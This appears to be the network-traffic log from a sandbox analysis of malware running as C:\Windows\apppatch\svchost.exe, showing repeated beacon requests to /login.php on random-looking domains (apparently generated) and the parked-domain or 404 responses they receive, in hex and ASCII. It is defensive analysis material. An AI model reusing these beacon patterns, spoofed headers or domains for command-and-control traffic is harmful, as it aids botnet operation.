                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  24192.168.2.64978776.223.67.189801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.804157019 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qexyhuv.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.231462002 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: openresty
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:39 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 114
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  25192.168.2.64979344.221.84.105801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.028064966 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gadyciz.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.457639933 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:39 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=75e0b1516d38a999d6d8bc4a9b71df74|66.23.206.109|1731347439|1731347439|0|1|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  26192.168.2.649794103.224.212.210801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.092050076 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyxynyx.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.661348104 CET340INHTTP/1.1 302 Found
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:39 GMT
                                                                                                                                                                                                                  server: Apache
                                                                                                                                                                                                                  set-cookie: __tad=1731347439.3564880; expires=Thu, 09-Nov-2034 17:50:39 GMT; Max-Age=315360000
                                                                                                                                                                                                                  location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0450-39f1-837b-46255b9c1f17
                                                                                                                                                                                                                  content-length: 2
                                                                                                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                  connection: close
                                                                                                                                                                                                                  Data Raw: 0a 0a
                                                                                                                                                                                                                  Data Ascii:


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  27192.168.2.649795103.224.182.252801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.146969080 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vofycot.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.707452059 CET338INHTTP/1.1 302 Found
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:39 GMT
                                                                                                                                                                                                                  server: Apache
                                                                                                                                                                                                                  set-cookie: __tad=1731347439.2338786; expires=Thu, 09-Nov-2034 17:50:39 GMT; Max-Age=315360000
                                                                                                                                                                                                                  location: http://ww16.vofycot.com/login.php?sub1=20241112-0450-397d-84b8-860db74cb63b
                                                                                                                                                                                                                  content-length: 2
                                                                                                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                  connection: close
                                                                                                                                                                                                                  Data Raw: 0a 0a
                                                                                                                                                                                                                  Data Ascii:


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  28192.168.2.649796154.85.183.50801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.266263962 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyval.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.071571112 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:39 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 138
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  ETag: "663ee226-8a"
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.077390909 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyval.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.396037102 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:40 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 138
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  ETag: "663ee226-8a"
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.263794899 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyval.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.559613943 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:58 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 138
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  ETag: "663ee226-8a"
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.589523077 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyval.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.874177933 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:58 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 138
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  ETag: "663ee226-8a"
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  29192.168.2.64980264.190.63.136801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.043607950 CET348OUTGET /login.php?sub1=20241112-0450-397d-84b8-860db74cb63b HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: ww16.vofycot.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: __tad=1731347439.2338786
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.681955099 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:40 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                  transfer-encoding: chunked
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                  pragma: no-cache
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_S2Ix9gORnb5udIjvNgijYhgIJg4FyOEyIO647bNfu3cE5HsJSqwl+T52hQG4kUU9uPd+8xG1mN+CdBHIvJY5TA==
                                                                                                                                                                                                                  last-modified: Mon, 11 Nov 2024 17:50:40 GMT
                                                                                                                                                                                                                  x-cache-miss-from: parking-7596689c44-prw7b
                                                                                                                                                                                                                  server: Parking/1.0
                                                                                                                                                                                                                  Data Raw: 32 45 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 53 32 49 78 39 67 4f 52 6e 62 35 75 64 49 6a 76 4e 67 69 6a 59 68 67 49 4a 67 34 46 79 4f 45 79 49 4f 36 34 37 62 4e 66 75 33 63 45 35 48 73 4a 53 71 77 6c 2b 54 35 32 68 51 47 34 6b 55 55 39 75 50 64 2b 38 78 47 31 6d 4e 2b 43 64 42 48 49 76 4a 59 35 54 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_S2Ix9gORnb5udIjvNgijYhgIJg4FyOEyIO647bNfu3cE5HsJSqwl+T52hQG4kUU9uPd+8xG1mN+CdBHIvJY5TA==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.681972980 CET1236INData Raw: 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d
                                                                                                                                                                                                                  Data Ascii: t source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com 576has it all. We hope you find what you are searching for!"><link rel="icon" type="im
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682085037 CET1236INData Raw: 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65
                                                                                                                                                                                                                  Data Ascii: lay:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visib
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682096958 CET1236INData Raw: 61 6e 63 65 3a 62 75 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76
                                                                                                                                                                                                                  Data Ascii: ance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#84848
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682110071 CET848INData Raw: 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73
                                                                                                                                                                                                                  Data Ascii: a{font-size:10px}.container-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682252884 CET1236INData Raw: 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 35 25 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 35 25 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73
                                                                                                                                                                                                                  Data Ascii: ookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-message__content-interactive{text-align:left;margin:0 15px;font-size:10px}.container-cookie-message__content-interactive-header,.container-cookie-message__content-i
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682265043 CET1236INData Raw: 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7a 2d 69 6e 64 65 78 3a 2d 39 39 39 7d 2e 62 74 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73
                                                                                                                                                                                                                  Data Ascii: splay:none;z-index:-999}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:#218838;border-color:#21883
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682277918 CET1236INData Raw: 74 65 6e 74 3a 22 22 3b 68 65 69 67 68 74 3a 32 36 70 78 3b 77 69 64 74 68 3a 32 36 70 78 3b 6c 65 66 74 3a 34 70 78 3b 62 6f 74 74 6f 6d 3a 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d 74
                                                                                                                                                                                                                  Data Ascii: tent:"";height:26px;width:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-c
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682288885 CET749INData Raw: 72 2d 63 6f 6e 74 65 6e 74 5f 5f 6c 65 66 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 62 67 2f 61 72 72 6f 77 73 2e 70 6e 67 22 29 20 23 30
                                                                                                                                                                                                                  Data Ascii: r-content__left{background:url("//img.sedoparking.com/templates/bg/arrows.png") #0e162e no-repeat top left;background-size:94% 640px;flex-grow:1;position:inherit;top:90px;overflow:hidden;z-index:-1}.container-content__right{background:url("//i
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682368040 CET1236INData Raw: 35 37 30 0d 0a 67 3a 30 20 30 20 31 2e 36 65 6d 20 30 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 30
                                                                                                                                                                                                                  Data Ascii: 570g:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet_justads.gif");float:left;padding-to
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.687674046 CET1236INData Raw: 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a
                                                                                                                                                                                                                  Data Ascii: st-element-link:visited{text-decoration:none}.webarchive-block__list-element-link:hover,.webarchive-block__list-element-link:active,.webarchive-block__list-eleme576nt-link:focus{text-decoration:underline}body{margin:0}.domain h1{font-size:


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  30192.168.2.649808199.59.243.227801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.259344101 CET350OUTGET /login.php?subid1=20241112-0450-39f1-837b-46255b9c1f17 HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: ww25.lyxynyx.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: __tad=1731347439.3564880
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.685638905 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:39 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                  content-length: 1230
                                                                                                                                                                                                                  x-request-id: b097eaca-ea1a-4a8d-8bee-a2968c7eba7b
                                                                                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TrgVLBvDmnzLPmfqH882isUMTYn0SzQhgqyQnN29uEEWWmo+h4WOccKkDJPzu96Zw/60DyrPlMXbw6b86P+b2w==
                                                                                                                                                                                                                  set-cookie: parking_session=b097eaca-ea1a-4a8d-8bee-a2968c7eba7b; expires=Mon, 11 Nov 2024 18:05:40 GMT; path=/
